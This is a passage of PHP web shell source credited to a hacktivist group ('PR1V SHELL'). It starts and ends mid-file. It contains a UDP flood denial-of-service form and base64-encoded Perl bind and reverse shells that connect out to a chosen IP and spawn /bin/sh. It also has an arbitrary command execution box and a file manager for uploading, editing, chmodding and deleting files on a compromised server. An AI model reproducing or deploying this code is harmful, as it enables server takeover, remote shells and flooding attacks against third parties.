4143. this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
4144. </td></tr></tr></table></b><br>
4145. <input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
4146. <br><br>
4147. <center>
4148. After initiating the DoS attack, please wait while the browser loads.
4149. </center>
4150.  
4151. </form>
4152. </center>
4153. <?php
4154. $submit = $_POST['fire'];
4155. if (isset($submit)) {
4156. $packets = 0;
4157. $ip = $_POST['ip'];
4158. $rand = $_POST['port'];
4159. set_time_limit(0);
4160. ignore_user_abort(FALSE);
4161. $exec_time = $_POST['time'];
4162. $time = time();
4163. print "Flooded: $ip on port $rand <br><br>";
4164. $max_time = $time + $exec_time;
4165. for ($i = 0;$i < 65535;$i++) {
4166. $out.= "X";
4167. }
4168. while (1) {
4169. $packets++;
4170. if (time() > $max_time) {
4171. break;
4172. }
4173. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
4174. if ($fp) {
4175. fwrite($fp, $out);
4176. fclose($fp);
4177. }
4178. }
4179. echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . "
4180.  
4181. mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
4182. ";
4183.  
4184. footer();}
4185.  
4186. }
4187.  
4188. // END DDOS ATTACK //
4189.  
4190.  
4191.  
4192. // NETWORK //
4193.  
4194.  
4195.  
4196. elseif($_GET['do'] == 'network') {
4197. echo "<form method='post'>
4198. <u>Bind Port:</u> <br>
4199. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
4200. <input type='submit' name='sub_bp' value='>>'>
4201. </form>
4202. <form method='post'>
4203. <u>Back Connect:</u> <br>
4204. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
4205. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
4206. <input type='submit' name='sub_bc' value='>>'>
4207. </form>";
4208. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
4209. if(isset($_POST['sub_bp'])) {
4210. $f_bp = fopen("/tmp/bp.pl", "w");
4211. fwrite($f_bp, base64_decode($bind_port_p));
4212. fclose($f_bp);
4213.  
4214. $port = $_POST['port_bind'];
4215. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
4216. sleep(1);
4217. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
4218. unlink("/tmp/bp.pl");
4219. }
4220. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
4221. if(isset($_POST['sub_bc'])) {
4222. $f_bc = fopen("/tmp/bc.pl", "w");
4223. fwrite($f_bc, base64_decode($bind_connect_p));
4224. fclose($f_bc);
4225.  
4226. $ipbc = $_POST['ip_bc'];
4227. $port = $_POST['port_bc'];
4228. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
4229. sleep(1);
4230. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
4231. unlink("/tmp/bc.pl");
4232.  
4233.  
4234.  
4235. footer();}
4236. }
4237. // END NETWORK //
4238.  
4239.  
4240.  
4241.  
4242. // PAGE //
4243. elseif($_GET['do'] == 'page'){
4244. echo "
4245. <center>
4246. <br>
4247.  
4248.  
4249. <font size='8px' color='grey'> Magician Hacktivist Philippines </font> <br>
4250. <font size='7px' color='grey'>'Security is Like a Magic'</font> <br>
4251. <hr width=50%>
4252. </center>
4253. <pre align=center>
4254.  
4255. <pre> ::We Are::
4256. </pre>
4257.  
4258. Alas | DOZ | CYBERMOON | NET7 | E | PARALLAX | MAGICIAN24
4259.  
4260. M0RPH1US | TOKHANG | QUIETUS | IMPROMPTU | SCORP1ON | POKER | D14MOND | MR.JOKER
4261.  
4262.  
4263. <iframe src=\"https://www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/MHphilippines&amp;width=450&amp;show_faces=true&amp;stream=false&amp;header=false&amp;connections=6&amp;height=200\" scrolling=\"no\"></iframe>
4264. </pre>
4265. ";
4266. footer();
4267. }
4268. // END PAGE //
4269.  
4270.  
4271.  
4272.  
4273.  
4274.  
4275.  
4276.  
4277.  
4278.  
4279.  
4280.  
4281.  
4282.  
4283.  
4284.  
4285.  
4286.  
4287.  
4288.  
4289.  
4290.  
4291.  
4292.  
4293.  
4294. // ==================================================================
4295. //
4296. // [ WE FUCKED SECUIRTY ]
4297. //
4298. // ===================================================================
4299.  
4300.  
4301. // UPLOAD FUNCTION //
4302.  
4303. // ================= //
4304. // ================= //
4305.  
4306.  
4307.  
4308.  
4309.  
4310. elseif($_GET['do'] == 'upload')
4311. {echo "";if($_POST['upload']) { if($_POST['mariopload'] == 'ThisDir') {
4312. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
4313. $act = "<font color=white>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
4314. } else {
4315. $act = "<font color=white>failed to upload file</font>";}
4316. } else {$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
4317. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) {if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
4318. $act = "<font color=white>Uploaded!</font> at <br><a href='http://$web' target='_blank'>$web</a>";
4319. } else {
4320. $act = "<font color=red>Failed to Upload File</font>";}
4321. } else {
4322. $act = "<font color=red>Failed To Upload File</font>";}}}
4323. echo "<br><div id=upx><center><b>UPLOAD FILE</b></center><center>
4324. <form method='post' enctype='multipart/form-data'>
4325. <div style='border:1px solid white; text-align:left;width:50%;margin:1%;'><br>
4326. <input type='checkbox' name='tipe_upload' value='home_root' checked>Home Root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br><input type='checkbox' name='mariopload' value='ThisDir'>$dir [ ".w($dir,"Writeable")." ]<br><br></div></center>
4327. <div id=upl>
4328. <input type='file' name='ix_file'>
4329. <input type='submit' value='>>' name='upload'></div><br><center>".$act."</center></div></form>";
4330. footer();}
4331.  
4332. /*End Upload*/
4333.  
4334.  
4335.  
4336. /*Start kill*/
4337. elseif($_GET['do'] == 'kill') {
4338.  
4339. $file = $_SERVER['PHP_SELF'];
4340. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
4341. die('<br><br><b><font color="#ff0000" size="2pt"><center>Shell has been Killed...Loading...</center></font></b><meta http-equiv="refresh" content="3; url=?" />');
4342. else
4343. echo '<font color="#fff600" size="2pt">ERROR!</font>';
4344.  
4345. footer();
4346. }
4347. /*End kill*/
4348.  
4349.  
4350.  
4351. /*Start Command*/
4352. elseif($_GET['do'] == 'cmd') {
4353. echo "<center><div id=edix><form method='post'>
4354. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
4355. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'></form></div>
4356. ";
4357.  
4358. if($_POST['do_cmd']) {
4359. echo "<div id=ecc><pre>".exe($_POST['cmd'])."</pre></div></center>";
4360. }
4361. footer();}
4362. //END COMMAND
4363.  
4364.  
4365. //New File
4366. elseif($_GET['act'] == 'newfile') {
4367. if($_POST['new_save_file']) {
4368. $newfile = htmlspecialchars($_POST['newfile']);
4369. $fopen = fopen($newfile, "a+");
4370. if($fopen) {
4371. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
4372. } else {
4373. $act = "<Center><font color=red>• Permission denied</font></center> ";footer();
4374. }
4375. }
4376. echo "<div id=edix><font color=white>New File? ".$act."</font></div>";
4377. echo"<br><center><form method='post'>
4378. Filename: <input type='text' name='newfile' value='$dir/MHPH.php' style='width: 450px;' height='10'>
4379. <input type='submit' name='new_save_file' value='Submit'>
4380. </form></center>";
4381. footer();
4382. }
4383. //END FILE
4384.  
4385. //New Folder
4386. elseif($_GET['act'] == 'newfolder') {
4387. if($_POST['new_save_folder']) {
4388. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4389. if(!mkdir($new_folder)) {
4390. $act = "<center><font color=red>• Permission Denied</font></center>";
4391. } else {
4392. $act = "<script>window.location='?dir=".$dir."';</script>";
4393. }
4394. }
4395. echo "<div id=edix> New Folder? ".$act."</div>";
4396. echo "<br><center><form method='post'>
4397. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4398. <input type='submit' name='new_save_folder' value='Submit'>
4399. </form></center>";
4400.  
4401. footer();}
4402. // END
4403.  
4404.  
4405. // RENAME DIRECTORY
4406. elseif($_GET['act'] == 'rename_dir') {
4407. if($_POST['dir_rename']) {
4408. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4409. if($dir_rename) {
4410. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4411. } else {
4412. $act = "<center><font color=red>• Permission Denied</font></center>";
4413. footer(); }
4414.  
4415. }
4416. echo "<div id=edix>Rename? ".$act."</div><br><center><form method='post'>
4417. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4418. <input type='submit' name='dir_rename' value='rename'>
4419. </form></center>";
4420. footer(); }
4421.  
4422. //DELETE DIR
4423. elseif($_GET['act'] == 'delete_dir') {
4424. if(is_dir($dir)) {
4425. if(is_writable($dir)) {
4426. @rmdir($dir);
4427. @exe("rm -rf $dir");
4428. @exe("rmdir /s /q $dir");
4429. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4430. } else {
4431. $act = "<font color=red>Could Not Remove ".basename($dir)."</font>";
4432. }
4433. }
4434. echo $act;
4435. }
4436.  
4437.  
4438. //ACTION VIEW
4439. elseif($_GET['act'] == 'view') {
4440. echo "<div id=edix>Filename<font color=white> ".basename($_GET['file'])." </font> &nbsp; <a href='?act=view&dir=$dir&file=".$_GET['file']."'> <button>View</button> </a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'> <button>Edit</button></a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'> <button>Rename</button></a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'><button> Download </button></a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'><button>Delete</button></a> <a href='?act=Chmod&dir=$dir&file=".$_GET['file']."'><button>Chmod</button></a><br>".$act."</div>";
4441. echo "<center><textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea></center><br>";
4442. footer();
4443. } elseif($_GET['act'] == 'edit') {
4444. if($_POST['save']) {
4445. $save = file_put_contents($_GET['file'], $_POST['src']);
4446. if($save) {
4447. $act = "<font color=white>Saved</font>";
4448. } else {
4449. $act = "<font color=red>Permission Denied</font>";
4450. }
4451. echo "<br>";
4452. }
4453. echo "<div id=edix>Filename<font color=white> ".basename($_GET['file'])." </font> &nbsp; <a href='?act=view&dir=$dir&file=".$_GET['file']."'> <button>View</button> </a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'> <button>Edit</button></a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'> <button>Rename</button></a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'><button> Download </button></a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'><button>Delete</button></a> <a href='?act=Chmod&dir=$dir&file=".$_GET['file']."'><button>Chmod</button></a><br>".$act."</div>";
4454. echo "<center><form method='post'>
4455. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4456. <input type='submit' value='Save' name='save' style='width: 500px;'>
4457. </form><br>";
4458.  
4459. footer();
4460. } elseif($_GET['act'] == 'Chmod') {
4461.  
4462. if(isset($_POST['perm'])){
4463. if(chmod($_POST['path'],$_POST['perm'])){
4464. $act = 'Change Permission Done.';
4465. }else{
4466. $act = 'Change Permission Error.';
4467. }
4468. }
4469. echo "<div id=edix>Filename<font color=white> ".basename($_GET['file'])." </font> &nbsp; <a href='?act=view&dir=$dir&file=".$_GET['file']."'> <button>View</button> </a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'> <button>Edit</button></a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'> <button>Rename</button></a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'><button> Download </button></a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'><button>Delete</button></a> <a href='?act=Chmod&dir=$dir&file=".$_GET['file']."'><button>Chmod</button></a><br>".$act."</div>";
4470. echo '<div id=edix><center><form method="POST">
4471. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
4472. <input type="hidden" name="path" value="'.$_POST['path'].'">
4473. <input type="hidden" name="opt" value="chmod">
4474. <input type="submit" value="Go" />
4475. </form></center></div>';
4476. footer();
4477.  
4478. } elseif($_GET['act'] == 'rename') {
4479. if($_POST['do_rename']) {
4480. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4481. if($rename) {
4482. $act = "<script>window.location='?dir=".$dir."';</script>";
4483. } else {
4484. $act = "<font color=red>Permission Denied</font>";
4485. }
4486.  
4487. }
4488. echo "<div id=edix>Filename<font color=white> ".basename($_GET['file'])." </font> &nbsp; <a href='?act=view&dir=$dir&file=".$_GET['file']."'> <button>View</button> </a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'> <button>Edit</button></a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'> <button>Rename</button></a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'><button> Download </button></a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'><button>Delete</button></a> <a href='?act=Chmod&dir=$dir&file=".$_GET['file']."'><button>Chmod</button></a><br>".$act."</div>";
4489. echo "<center><form method='post'>
4490. <input type='text' value='".basename($_GET['file'])."' name='Rename' style='width: 450px;' height='10'>
4491. <input type='submit' name='do_rename' value='rename'>
4492. </form></center><br>";
4493. footer();
4494. } elseif($_GET['act'] == 'delete') {
4495. $delete = unlink($_GET['file']);
4496. if($delete) {
4497. $act = "<script>window.location='?dir=".$dir."';</script>";
4498. } else {
4499. $act = "<center><font color=red>Permission Denied</font></center>";
4500. }
4501. echo $act;
4502. } else {
4503. if(is_dir($dir) === true) {
4504. if(!is_readable($dir)) {
4505. echo "<br><br><center><font color=red>Not Readable <a href='?'><button>Back To Home</button></a></font></center>"; footer();
4506. } else {
4507.  
4508.  
4509. echo '
4510. <div style="overflow-x:auto;"><table width="100%" class="table_home" border="0" cellpadding="3" style="overflow-x:auto;" cellspacing="1" align="center">
4511. <tr>
4512. <th class="th_home"><center>NAME</center></th>
4513. <th class="th_home"><center>TYPES</center></th>
4514. <th class="th_home"><center>ACTION</center></th>
4515. <th class="th_home"><center>SIZE</center></th>
4516. <th class="th_home"><center>PERMISSION</center></th>
4517. <th class="th_home"><center>OWNER / GROUP</center></th>
4518. <th class="th_home"><center>LAST EDITED</center></th>
4519. </tr>';
4520. $scandir = scandir($dir);
4521. foreach($scandir as $dirx) {
4522. $dtype = filetype("$dir/$dirx");
4523. $dtime = date("F d Y g:i:sa", filemtime("$dir/$dirx"));
4524. if(function_exists('posix_getpwuid')) {
4525. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
4526. $downer = $downer['name'];
4527. } else {
4528. //$downer = $uid;
4529. $downer = fileowner("$dir/$dirx");
4530. }
4531. if(function_exists('posix_getgrgid')) {
4532. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
4533. $dgrp = $dgrp['name'];
4534. } else {
4535. $dgrp = filegroup("$dir/$dirx");
4536. }
4537. if(!is_dir("$dir/$dirx")) continue;
4538. if($dirx === '..') {
4539. $href = "<a href='?dir=".dirname($dir)."'>UP..</a>";
4540. } elseif($dirx === '.') {
4541. $href = "<a href='?dir=$dir'>$dirx</a>";
4542. } else {
4543. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4544. }
4545. if($dirx === '.' || $dirx === '..') {
4546. $act_dir = " <a href='?act=newfile&dir=$dir'><button> New File</button></a> <a href='?act=newfolder&dir=$dir'> <button>New Folder</button></a> ";
4547. } else {
4548. $act_dir = " <a href='?act=rename_dir&dir=$dir/$dirx'><button>Rename</button></a> <a href='?act=delete_dir&dir=$dir/$dirx'><button>Delete</button></a> ";
4549. }
4550. echo "<tr>";
4551. echo "
4552. <td class='hp_home'>$href</td>";
4553. echo "<td class='hp_home'><center><font color=white>$dtype</font></center></td>";
4554. echo "<td class='hp_home' style='padding-left: 20px;'>$act_dir</td>";
4555.  
4556. echo "<td class='hp_home'><center>0/DIR</center></th></td>";
4557. echo "<td class='hp_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4558.  
4559. echo "<td class='hp_home'><center>$downer/$dgrp</center></td>";
4560. echo "<td class='hp_home'><center>$dtime</center></td>";
4561. echo "</tr>";
4562. }
4563. }
4564. } else {
4565. echo "<center><br><br><font color=red size=5>Can't Open Directory <a href='?'><button>Back To Home</button></a></font></center>";
4566. footer();
4567. }
4568. foreach($scandir as $file) {
4569.  
4570. $ftype = filetype("$dir/$file");
4571. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4572. $size = filesize("$dir/$file")/1024;
4573. $size = round($size,3);
4574. if(function_exists('posix_getpwuid')) {
4575. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
4576. $fowner = $fowner['name'];
4577. } else {
4578. //$downer = $uid;
4579. $fowner = fileowner("$dir/$file");
4580. }
4581. if(function_exists('posix_getgrgid')) {
4582. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
4583. $fgrp = $fgrp['name'];
4584. } else {
4585. $fgrp = filegroup("$dir/$file");
4586. }
4587. if($size > 1024) {
4588. $size = round($size/1024,2). 'MB';
4589. } else {
4590. $size = $size. 'KB';
4591. }
4592. if(!is_file("$dir/$file")) continue;
4593. echo "<tr>";
4594. echo "<td class='hp_home'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
4595. echo "<td class='hp_home'><center><font color=orange>$ftype</font></center></td>";
4596. echo "<td class='hp_home' style='padding-left: 15px;'>
4597.  
4598. <a href='?act=download&dir=$dir&file=$dir/$file'><button>Download</button></a> <a href='?act=edit&dir=$dir&file=$dir/$file'><button>Edit</button></a> <a href='?act=delete&dir=$dir&file=$dir/$file'><button>Delete</button></a> </td>";
4599.  
4600. echo "<td class='hp_home'><center>$size</center></td>";
4601. echo "<td class='hp_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4602.  
4603. echo "<td class='hp_home'><center>$fowner/$fgrp</center></td>";
4604. echo "<td class='hp_home'><center>$ftime</center></td>";
4605. echo "</tr>";
4606. }
4607. echo "</table></div>";
4608.  
4609.  
4610. if(!is_readable($dir)) {
4611. //
4612. } else {
4613.  
4614.  
4615.  
4616.  
4617.  
4618.  
4619.  
4620.  
4621.  
4622.  
4623. footer();}
4624. }
4625.  
4626.  
4627.  
4628.  
4629. //FOOTER
4630.  
4631. function footer(){
4632. echo "<br><center>
4633. <div id=edi><b> © MHPH | PR1V SHELL | RECODED By M0RPH1US</div></b></center>";}
4634.  
4635.  
4636.  
4637. ?></body></html>